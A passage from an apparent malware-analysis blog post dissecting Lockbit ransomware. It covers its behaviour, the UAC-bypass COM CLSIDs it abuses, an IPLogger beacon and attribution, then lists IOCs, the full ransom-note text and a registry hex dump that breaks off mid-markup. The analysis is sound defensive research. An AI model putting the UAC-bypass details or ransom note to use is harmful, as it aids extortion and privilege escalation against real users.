<p>Here we can see some kind of arbitrary file system path (does not seem to be a "kill switch" as it will still encrypt files with the text file present) and a URL. This Web Address resolves to IPLogger[.]org, an IP tracking system often abused by Malware.</p>
<p><center><img alt="File Path and IPLogger URL" src="https://dissectingmalwa.re/img/abcd-path.png"></center></p>
<p></br></p>
<p>Lockbit creates a Mutex to protect it's resources and components. The destinct name of this Mutex that we'll discover later will tell us a lot about this strain.</p>
<p><center><img alt="Mutex Creation" src="https://dissectingmalwa.re/img/abcd-mutx.png"></center></p>
<p></br></p>
<p>I'm not sure if this string comparison structure was interpreted in that way by IDA or if the code is built like that, but this would certainly qualify as amateur hour.</p>
<p><center><img alt="Multiple chained String comparisons" src="https://dissectingmalwa.re/img/abcd-strcomp.png"></center></p>
<p></br></p>
<p>This part of the Graph shows how the Log (weirdly enough it uses the extension .reg, e.g. <em>resultlog6.reg</em> see below) that the Ransomware drops on the Desktop is generated. Everytime a file is skipped in the encryption process it will at a line to the log. For example "skipped by Extension" is the classic behaviour of ransomware by filtering for suffixes like <em>.dll, .exe, .sys, .lnk, .reg, .txt</em>, "skipped by filename" corresponds to files created by the ransomware and necessary system files. "Skipped by SYSTEm" is logged for files that are in use by Windows Processes. </p>
<p><center><img alt="Log Messages for skipped files" src="https://dissectingmalwa.re/img/abcd-skipped.png"></center></p>
<p><center><img alt="Log Messages for skipped files" src="https://dissectingmalwa.re/img/abcd-log.png"></center></p>
<p></br></p>
<p>The same procedure as every year: Deleting Restore Points and Shadow copies plus disabling startup recovery via <em>ShellExecuteEX</em>.</p>
<p><center><img alt="Deletion of Backups and Shadowcopies" src="https://dissectingmalwa.re/img/abcd-shellcmds.png"></center></p>
<p></br></p>
<p>The txt File that will be dropped into every directory up for encryption will be called <em>Restore-My-Files.txt</em>.</p>
<p><center><img alt="The Ransomnote" src="https://dissectingmalwa.re/img/abcd-note.png"></center></p>
<p></br></p>
<p>As the ransomnote is pretty short and bare-bones they just hardcoded the strings right in without any obfuscation/encryption.
<center><img alt="Ransomnote being written to a file" src="https://dissectingmalwa.re/img/abcd-note2.png"></center></p>
<p></br></p>
<p>And that is how Lockbit gets its name :D It creates a Registry Key in <strong>HKEY_CURRENT_USER\SOFTWARE\Lockbit</strong> with two values called <em>full</em> and <em>Public</em>. Full contains the victim ID displayed in the Ransomnote in hex format.</p>
<p><center><img alt="How Lockbit got its name" src="https://dissectingmalwa.re/img/abcd-lockbit.png"></center></p>
<p></br>
</br></p>
<p>If you read my post about MedusaLocker you might remeber this UAC Bypass via <em>{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</em> exploiting the <strong>ICMLuaUtil</strong> elvevated COM Interface-Object. This Bypass works since Windows 7 and has not been fixed since.</p>
<p><center><img alt="Use of IPlogger.org" src="https://dissectingmalwa.re/img/abcd-clsid.png"></center></p>
<p><center><img alt="User Access Control Bypass" src="https://dissectingmalwa.re/img/abcd-uac.png"></center></p>
<p></br></p>
<p>What I thought would be another UAC Bypass is actually a variant of the one above. The CLSID <em>{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}</em> refers to the ColorDataProxy COM Object which is classified as the same Bypass method in hfiref0x's <a href="https://github.com/hfiref0x/UACME">UACME</a> as number #43.</p>
<p><center><img alt="User Access Control Bypass" src="https://dissectingmalwa.re/img/abcd-uac3.png"></center></p>
<p></br>
</br></p>
<p>Speaking of UAC Bypasses: After debugging a bit further the Malware started to reference a strange Registry Key <em>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\Calibration\DisplayCalibrator</em> that normally doesn't have anything to do with malicious actions. </p>
<p><center><img alt="Calibration UAC" src="https://dissectingmalwa.re/img/abcd-cal.png"></center></p>
<p></br></p>
<p>Plugging the key into a search engine gives us this tweet by <em>@James_inthe_box</em> from January of this year:</p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Hey <a href="https://twitter.com/Hexacorn?ref_src=twsrc%5Etfw">@Hexacorn</a> you ever see key:<br><br>"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ICM\Calibration\DisplayCalibrator<br><br>used as persistence? Thanks to <a href="https://twitter.com/justmlwhunting?ref_src=twsrc%5Etfw">@justmlwhunting</a> for having me look at a @huadhservhelper sample. <a href="https://t.co/qyKA5iGaEd">pic.twitter.com/qyKA5iGaEd</a></p>— James (@James_inthe_box) <a href="https://twitter.com/James_inthe_box/status/1084982201496657921?ref_src=twsrc%5Etfw">January 15, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p>After a successfull encryption run the Ransomware tries to contact a Server hosted at Hetzner in Germany which belongs to IPlogger, a service that seems to be quite popular with cybercriminals as can be seen in the previous analysis of <strong>SaveTheQueen</strong>.</p>
<p><center><img alt="Use of IPlogger.org" src="https://dissectingmalwa.re/img/abcd-ip2.png"></center></p>
<p></br></p>
<p><center><img alt="Use of IPlogger.org" src="https://dissectingmalwa.re/img/abcd-iplog.png"></center></p>
<p></br>
</br></p>
<p>So let's talk a bit of Attribution / Genealogy. I'm not a fan of desparately trying to identify the actors behind samples / "campaigns" without concise proof, but in this case there is some pretty compelling evidence:</p>
<p>First off we have this String <em>XO1XADpO01</em> in the Lockbit sample that was also used in the PhobosImposter Ransomware. Even better: the name and content of the ransomnote are very similar as well, as can be seen in this <a href="https://id-ransomware.blogspot.com/2019/10/phobosimposter-ransomware.html">article</a> written by Amigo-A.</p>
<p><center><img alt="Use of IPlogger.org" src="https://dissectingmalwa.re/img/abcd-weird.png"></center></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr">2019-10-25: π€‘<a href="https://twitter.com/hashtag/PhobosImposter?src=hash&ref_src=twsrc%5Etfw">#PhobosImposter</a> "XO1XADpO01" Mutex <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a>π|<br>Ref -> <a href="https://t.co/CebnlFH1cK">https://t.co/CebnlFH1cK</a><br>Another VariantβΆοΈ<br>π§¬BCryptGenRandom | aeskeygenassist | aes_sbox func<br>π¦Task Kill <br>MD5: 7c8165be532d14c3b2bc81716d23f4ca<br>h/t <a href="https://twitter.com/malwrhunterteam?ref_src=twsrc%5Etfw">@malwrhunterteam</a> team <a href="https://t.co/QnTILUTAnk">pic.twitter.com/QnTILUTAnk</a></p>— Vitali Kremez (@VK_Intel) <a href="https://twitter.com/VK_Intel/status/1187805345336434689?ref_src=twsrc%5Etfw">October 25, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p>The E-Mail Accounts (goodmen@countermail[.]com) used in two of the reported cases also make the connecting to the Goodmen Ransomware, which again features a note named <em>Restore-My-Files.txt</em> and even the binaries are named similar to this strain by sticking to the <em>RICK.exe</em> naming scheme. A more detailed description by Amigo-A can be found <a href="https://id-ransomware.blogspot.com/2019/08/good-goodmen-ransomware.html">here</a>.</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Lockbit (ABCD)</h3>
<div class="highlight"><pre><span></span><span class="n">Ricks75</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 70cb1a8cb4259b72b704e81349c2ad5ac60cd1254a810ef68757f8c9409e3ea6</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="n">CS98Y9MUIaJw</span><span class="o">/</span><span class="n">yGU6H9ed2VEVNUmjolqVMqqU</span><span class="o">+</span><span class="n">hV2</span><span class="o">+</span><span class="mi">70</span><span class="n">mXxc</span><span class="p">:</span><span class="n">Cy8Y9uJVbHo4Ve</span><span class="o">+</span><span class="n">mjhVMqqD</span><span class="o">/</span><span class="n">P7Xx</span>
<span class="n">Ricks72</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: b02d57f1c4f7f233044a56fdc57c89b6cc3661479dccc3b4cfa1f6f9d20cd893</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="o">+</span><span class="n">uBQrT1eLBBdU</span><span class="o">/</span><span class="mi">1</span><span class="n">GJj4UgvpedwwtVNUmrTF3MqqU</span><span class="o">+</span><span class="n">hV2xQie</span><span class="p">:</span><span class="o">+</span><span class="n">uBUwX0C4Vvs2wT</span><span class="o">+</span><span class="n">mr5MqqD</span><span class="o">/</span><span class="n">Fi</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">Restore</span><span class="o">-</span><span class="n">My</span><span class="o">-</span><span class="n">Files</span><span class="p">.</span><span class="n">txt</span>
<span class="n">Test</span><span class="p">.</span><span class="n">txt</span> <span class="p">(</span><span class="k">found</span> <span class="k">on</span> <span class="n">a</span> <span class="n">victim</span><span class="err">'</span><span class="n">s</span> <span class="k">system</span><span class="p">,</span> <span class="mi">0</span> <span class="n">bytes</span> <span class="k">in</span> <span class="k">Size</span><span class="p">)</span>
<span class="n">Process</span> <span class="n">Hacker</span> <span class="mi">2</span> <span class="n">was</span> <span class="n">installed</span> <span class="k">by</span> <span class="n">the</span> <span class="n">intruders</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">goeila</span><span class="nv">@countermail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">gupzkz</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
<span class="n">abcd</span><span class="o">-</span><span class="n">help</span><span class="nv">@countermail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">supportpc</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
<span class="n">goodsupport</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
<span class="n">goodmen</span><span class="nv">@countermail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">goodmen</span><span class="nv">@cock</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">li</span><span class="w"></span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">iplo</span><span class="p">[.]</span><span class="n">ru</span><span class="o">/</span><span class="mi">1</span><span class="n">LJjq7</span><span class="p">.</span><span class="n">txt</span> <span class="p">(</span><span class="mi">88</span><span class="p">.</span><span class="mi">99</span><span class="p">.</span><span class="mi">66</span><span class="p">[.]</span><span class="mi">31</span><span class="p">,</span> <span class="n">belongs</span> <span class="k">to</span> <span class="n">iplogger</span><span class="p">[.]</span><span class="n">org</span><span class="p">)</span>
</pre></div>
<h3>Ransomnote</h3>
<div class="highlight"><pre><span></span><span class="nv">All</span> <span class="nv">your</span> <span class="nv">important</span> <span class="nv">files</span> <span class="nv">are</span> <span class="nv">encrypted</span><span class="o">!</span>
<span class="nv">There</span> <span class="nv">is</span> <span class="nv">only</span> <span class="nv">one</span> <span class="nv">way</span> <span class="nv">to</span> <span class="nv">get</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">back</span>:
<span class="mi">1</span>. <span class="nv">Contact</span> <span class="nv">with</span> <span class="nv">us</span>
<span class="mi">2</span>. <span class="k">Send</span> <span class="nv">us</span> <span class="mi">1</span> <span class="nv">any</span> <span class="nv">encrypted</span> <span class="nv">your</span> <span class="nv">file</span> <span class="nv">and</span> <span class="nv">your</span> <span class="nv">personal</span> <span class="nv">key</span>
<span class="mi">3</span>. <span class="nv">We</span> <span class="nv">will</span> <span class="nv">decrypt</span> <span class="mi">1</span> <span class="nv">file</span> <span class="k">for</span> <span class="nv">test</span><span class="ss">(</span><span class="nv">maximum</span> <span class="nv">file</span> <span class="nv">size</span> <span class="o">-</span> <span class="mi">1</span> <span class="nv">MB</span><span class="ss">)</span>, <span class="nv">its</span> <span class="nv">guarantee</span> <span class="nv">what</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">decrypt</span> <span class="nv">your</span> <span class="nv">files</span>
<span class="mi">4</span>. <span class="nv">Pay</span>
<span class="mi">5</span>. <span class="nv">We</span> <span class="k">send</span> <span class="k">for</span> <span class="nv">you</span> <span class="nv">decryptor</span> <span class="nv">software</span>
<span class="nv">We</span> <span class="nv">accept</span> <span class="nv">Bitcoin</span>
<span class="nv">Attention</span><span class="o">!</span>
<span class="k">Do</span> <span class="nv">not</span> <span class="nv">rename</span> <span class="nv">encrypted</span> <span class="nv">files</span>.
<span class="k">Do</span> <span class="nv">not</span> <span class="nv">try</span> <span class="nv">to</span> <span class="nv">decrypt</span> <span class="nv">using</span> <span class="nv">third</span> <span class="nv">party</span> <span class="nv">software</span>, <span class="nv">it</span> <span class="nv">may</span> <span class="nv">cause</span> <span class="nv">permanent</span> <span class="nv">data</span> <span class="nv">loss</span>.
<span class="nv">Decryption</span> <span class="nv">of</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">with</span> <span class="nv">the</span> <span class="nv">help</span> <span class="nv">of</span> <span class="nv">third</span> <span class="nv">parties</span> <span class="nv">may</span> <span class="nv">cause</span> <span class="nv">increased</span> <span class="nv">price</span><span class="ss">(</span><span class="nv">they</span> <span class="nv">add</span> <span class="nv">their</span> <span class="nv">fee</span> <span class="nv">to</span> <span class="nv">our</span><span class="ss">)</span>
<span class="nv">Contact</span> <span class="nv">information</span>: <span class="nv">abcd</span><span class="o">-</span><span class="nv">help</span>@<span class="nv">countermail</span>[.]<span class="nv">com</span>
<span class="nv">Be</span> <span class="nv">sure</span> <span class="nv">to</span> <span class="nv">duplicate</span> <span class="nv">your</span> <span class="nv">message</span> <span class="nv">on</span> <span class="nv">the</span> <span class="nv">e</span><span class="o">-</span><span class="nv">mail</span>: <span class="nv">supportpc</span>@<span class="nv">cock</span>[.]<span class="nv">li</span>
<span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">id</span>:
[<span class="nv">Redacted</span>]
</pre></div>
<h3>Registry Keys</h3>
<p>A regshot dump can be found <a href="https://dissectingmalwa.re/other/lockbit-regshot.txt">here</a></p>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">LockBit</span><span class="err">\</span><span class="k">full</span><span class="p">:</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">84</span> <span class="n">FB</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">8</span><span class="n">A</span> <span class="n">C6</span> <span class="mi">3</span><span class="n">A</span> <span class="n">E8</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">39</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">40</span> <span class="mi">57</span> <span class="n">D2</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">15</span> <span class="n">CD</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">50</span> <span class="n">A4</span> <span class="mi">8</span><span class="n">A</span> <span class="n">CB</span> <span class="mi">29</span> <span class="mi">58</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">76</span> <span class="n">D2</span> <span class="mi">55</span> <span class="mi">84</span> <span class="n">C7</span> <span class="mi">6</span><span class="n">D</span> <span class="n">AF</span> <span class="mi">14</span> <span class="n">BA</span> <span class="n">BF</span> <span class="mi">78</span> <span class="mi">8</span><span class="n">F</span> <span class="mi">95</span> <span class="n">B0</span> <span class="mi">66</span> <span class="mi">8</span><span class="n">A</span> <span class="mi">56</span> <span class="mi">6</span><span class="n">E</span> <span class="n">AB</span> <span class="mi">74</span> <span class="n">A4</span> <span class="n">A1</span> <span class="mi">68</span> <span class="n">A0</span> <span class="mi">88</span> <span class="mi">00</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">31</span> <span class="mi">82</span> <span class="mi">61</span> <span class="mi">30</span> <span class="n">A0</span> <span class="mi">40</span> <span class="n">D3</span> <span class="mi">40</span> <span class="n">DB</span> <span class="mi">11</span> <span class="n">D1</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">38</span> <span class="n">BB</span> <span class="mi">95</span> <span class="n">DD</span> <span class="n">FF</span> <span class="mi">5</span><span class="n">F</span> <span class="n">D7</span> <span class="n">AB</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">77</span> <span class="mi">88</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">64</span> <span class="mi">17</span> <span class="n">E4</span> <span class="mi">35</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">5</span><span class="n">E</span> <span class="n">AC</span> <span class="n">F0</span> <span class="n">FF</span> <span class="n">C2</span> <span class="mi">6</span><span class="n">A</span> <span class="n">B7</span> <span class="mi">51</span> <span class="n">AC</span> <span class="mi">35</span> <span class="mi">20</span> <span class="n">DD</span> <span class="mi">2</span><span class="n">F</span> <span class="n">DC</span> <span class="mi">93</span> <span class="n">AA</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">91</span> <span class="n">F7</span> <span class="mi">91</span> <span class="n">D1</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">92</span> <span class="mi">9</span><span class="n">A</span> <span class="mi">34</span> <span class="mi">9</span><span class="n">B</span> <span class="n">BA</span> <span class="mi">59</span> <span class="n">EB</span> <span class="n">AE</span> <span class="n">AE</span> <span class="mi">00</span> <span class="mi">6</span><span class="n">F</span> <span class="n">BA</span> <span class="mi">66</span> <span class="n">DE</span> <span class="mi">0</span><span class="n">D</span> <span class="n">F0</span> <span class="n">A4</span> <span class="mi">65</span> <span class="n">AA</span> <span class="n">DC</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">06</span> <span class="n">EC</span> <span class="mi">91</span> <span class="mi">58</span> <span class="mi">04</span> <span class="n">D5</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">34</span> <span class="mi">01</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">56</span> <span class="n">EE</span> <span class="n">C3</span> <span class="mi">29</span> <span class="mi">69</span> <span class="n">EC</span> <span class="n">AA</span> <span class="n">C2</span> <span class="n">A8</span> <span class="mi">80</span> <span class="n">EB</span> <span class="mi">24</span> <span class="n">C8</span> <span class="mi">01</span> <span class="mi">77</span> <span class="mi">89</span> <span class="mi">99</span> <span class="mi">4</span><span class="n">B</span> <span class="n">EA</span> <span class="n">B1</span> <span class="mi">48</span> <span class="mi">93</span> <span class="mi">59</span> <span class="n">A9</span> <span class="n">CF</span> <span class="mi">52</span> <span class="mi">89</span> <span class="n">DA</span> <span class="n">A6</span> <span class="mi">45</span> <span class="mi">10</span> <span class="n">F1</span> <span class="mi">9</span><span class="n">A</span> <span class="n">E0</span> <span class="mi">34</span> <span class="n">F6</span> <span class="mi">22</span> <span class="mi">03</span> <span class="mi">38</span> <span class="mi">80</span> <span class="mi">75</span> <span class="mi">91</span> <span class="mi">8</span><span class="n">E</span> <span class="n">A0</span> <span class="n">C0</span> <span class="mi">66</span> <span class="n">E6</span> <span class="n">A7</span> <span class="mi">29</span> <span class="n">DE</span> <span class="mi">29</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">5</span><span class="n">A</span> <span class="n">FC</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">09</span> <span class="mi">78</span> <span class="mi">78</span> <span class="n">AD</span> <span class="n">C7</span> <span class="n">C1</span> <span class="mi">38</span> <span class="n">D9</span> <span class="mi">21</span> <span class="mi">4</span><span class="n">B</span> <span class="mi">42</span> <span class="mi">26</span> <span class="mi">01</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">1</span><span class="n">D</span> <span class="n">AE</span> <span class="mi">60</span> <span class="n">D6</span> <span class="n">A0</span> <span class="n">F1</span> <span class="mi">71</span> <span class="mi">19</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">91</span> <span class="n">F1</span> <span class="mi">92</span> <span class="n">B7</span> <span class="mi">96</span> <span class="n">D9</span> <span class="mi">87</span> <span class="n">C7</span> <span class="mi">6</span><span class="n">F</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">1</span><span class="n">F</span> <span class="n">A9</span> <span class="n">A0</span> <span class="n">CD</span> <span class="mi">43</span> <span class="mi">19</span> <span class="mi">88</span> <span class="mi">81</span> <span class="n">C0</span> <span class="n">F2</span> <span class="mi">5</span><span class="n">E</span> <span class="mi">60</span> <span class="mi">84</span> <span class="mi">06</span> <span class="mi">89</span> <span class="mi">13</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">37</span> <span class="mi">85</span> <span class="mi">63</span> <span class="mi">86</span> <span class="n">EA</span> <span class="n">E9</span> <span class="mi">04</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">31</span> <span class="n">A9</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">7</span><span class="n">E</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">22</span> <span class="mi">60</span> <span class="n">D3</span> <span class="mi">80</span> <span class="n">F1</span> <span class="mi">76</span> <span class="mi">53</span> <span class="n">B2</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">37</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">21</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">2</span><span class="n">A</span> <span class="n">B1</span> <span class="mi">10</span> <span class="mi">11</span> <span class="n">A5</span> <span class="n">B3</span> <span class="mi">26</span> <span class="mi">4</span><span class="k">C</span> <span class="n">C5</span> <span class="mi">82</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">62</span> <span class="n">C7</span> <span class="mi">62</span> <span class="mi">7</span><span class="n">F</span> <span class="n">FF</span> <span class="mi">78</span> <span class="n">A6</span> <span class="n">E2</span> <span class="n">EF</span> <span class="n">F1</span> <span class="n">AC</span> <span class="mi">60</span> <span class="n">F4</span> <span class="n">DF</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">00</span> <span class="n">C7</span> <span class="n">F4</span> <span class="mi">16</span> <span class="n">AD</span>
<span class="mi">07</span> <span class="mi">23</span> <span class="n">F4</span> <span class="mi">1</span><span class="n">B</span> <span class="n">CC</span> <span class="n">CD</span> <span class="mi">88</span> <span class="n">F8</span> <span class="mi">79</span> <span class="mi">63</span> <span class="mi">65</span> <span class="mi">66</span> <span class="mi">65</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">76</span> <span class="n">F0</span> <span class="n">DB</span> <span class="n">F9</span> <span class="n">A8</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">46</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">96</span> <span class="mi">40</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">24</span> <span class="mi">1</span><span class="n">F</span> <span class="n">B5</span> <span class="mi">4</span><span class="n">B</span> <span class="n">C3</span> <span class="n">CC</span> <span class="mi">08</span> <span class="mi">81</span> <span class="mi">92</span> <span class="n">C5</span> <span class="n">F7</span> <span class="mi">57</span> <span class="n">B4</span> <span class="mi">4</span><span class="k">C</span> <span class="n">E2</span> <span class="mi">70</span> <span class="mi">3</span><span class="k">C</span> <span class="n">FD</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">1</span><span class="n">E</span> <span class="n">C1</span> <span class="mi">24</span> <span class="n">D0</span> <span class="mi">03</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">60</span> <span class="n">C8</span> <span class="mi">13</span> <span class="n">C8</span> <span class="n">F2</span> <span class="mi">12</span> <span class="mi">34</span> <span class="mi">66</span> <span class="n">B6</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">8</span><span class="n">F</span> <span class="n">BE</span> <span class="n">AD</span> <span class="mi">94</span> <span class="n">E0</span> <span class="mi">42</span> <span class="n">C0</span> <span class="mi">1</span><span class="n">D</span> <span class="n">C0</span> <span class="n">AE</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">12</span> <span class="n">F7</span> <span class="mi">57</span> <span class="n">AB</span> <span class="n">FA</span> <span class="n">C6</span> <span class="mi">65</span> <span class="n">F8</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">68</span> <span class="n">BB</span> <span class="n">AD</span> <span class="mi">33</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">0</span><span class="n">E</span> <span class="n">A7</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">04</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">1</span><span class="k">C</span> <span class="n">ED</span> <span class="n">BF</span> <span class="n">F3</span> <span class="n">D6</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">03</span> <span class="mi">8</span><span class="n">E</span> <span class="n">B1</span> <span class="mi">75</span> <span class="mi">1</span><span class="n">A</span> <span class="n">BF</span> <span class="mi">11</span> <span class="n">D2</span> <span class="mi">8</span><span class="k">C</span> <span class="n">E6</span> <span class="mi">05</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">23</span> <span class="n">C7</span> <span class="n">AA</span> <span class="mi">15</span> <span class="n">C6</span> <span class="n">A4</span> <span class="mi">07</span> <span class="mi">04</span> <span class="n">DE</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">06</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">7</span><span class="k">C</span> <span class="n">AF</span> <span class="n">C0</span> <span class="mi">22</span> <span class="mi">53</span> <span class="n">E6</span> <span class="n">E6</span> <span class="mi">41</span> <span class="n">EA</span> <span class="n">A0</span> <span class="mi">4</span><span class="n">D</span> <span class="n">F0</span> <span class="mi">65</span> <span class="n">C7</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">04</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">79</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">50</span> <span class="mi">75</span> <span class="mi">35</span> <span class="n">F6</span> <span class="n">BE</span> <span class="n">C1</span> <span class="mi">6</span><span class="n">E</span> <span class="n">C0</span> <span class="mi">91</span> <span class="mi">2</span><span class="k">C</span> <span class="n">D4</span> <span class="n">B7</span> <span class="mi">59</span> <span class="mi">7</span><span class="n">D</span> <span class="n">D9</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">46</span> <span class="n">FE</span> <span class="n">B2</span> <span class="mi">3</span><span class="n">E</span> <span class="n">B0</span> <span class="mi">28</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">08</span> <span class="mi">95</span> <span class="mi">28</span> <span class="mi">99</span> <span class="mi">56</span> <span class="n">CC</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">14</span> <span class="n">A2</span> <span class="n">A4</span> <span class="mi">05</span> <span class="mi">69</span> <span class="n">EF</span> <span class="mi">34</span> <span class="mi">6</span><span class="n">B</span> <span class="n">F0</span> <span class="mi">99</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">4</span><span class="k">C</span> <span class="n">E5</span> <span class="n">D0</span> <span class="mi">98</span> <span class="mi">31</span> <span class="n">C8</span> <span class="n">AB</span> <span class="n">AF</span> <span class="n">B3</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">89</span> <span class="n">CD</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">23</span> <span class="n">F8</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">28</span> <span class="mi">7</span><span class="n">A</span> <span class="n">FF</span> <span class="mi">07</span> <span class="mi">49</span> <span class="n">AC</span> <span class="mi">97</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">3</span><span class="n">A</span> <span class="n">AA</span> <span class="mi">7</span><span class="n">F</span> <span class="n">EA</span> <span class="mi">36</span> <span class="mi">30</span> <span class="n">B4</span> <span class="mi">98</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">94</span> <span class="mi">5</span><span class="n">A</span> <span class="n">BD</span> <span class="n">A6</span> <span class="mi">28</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">70</span> <span class="mi">10</span> <span class="n">BA</span> <span class="mi">09</span> <span class="mi">89</span> <span class="n">AD</span> <span class="mi">35</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">90</span> <span class="n">F0</span> <span class="mi">54</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">7</span><span class="n">A</span> <span class="n">AB</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">09</span> <span class="mi">59</span> <span class="mi">4</span><span class="n">B</span> <span class="mi">35</span> <span class="n">E4</span> <span class="n">FB</span> <span class="mi">8</span><span class="n">E</span> <span class="mi">86</span> <span class="n">B0</span> <span class="n">D8</span> <span class="mi">6</span><span class="n">D</span> <span class="n">D6</span> <span class="n">A8</span> <span class="n">EA</span> <span class="mi">12</span> <span class="mi">3</span><span class="n">A</span> <span class="n">CB</span> <span class="n">D0</span> <span class="n">A1</span> <span class="n">B2</span> <span class="mi">1</span><span class="n">D</span> <span class="n">C4</span> <span class="mi">4</span><span class="n">F</span> <span class="n">C9</span> <span class="mi">99</span> <span class="n">CE</span> <span class="mi">9</span><span class="n">A</span> <span class="mi">42</span> <span class="n">EC</span> <span class="mi">34</span> <span class="n">DB</span> <span class="n">B9</span> <span 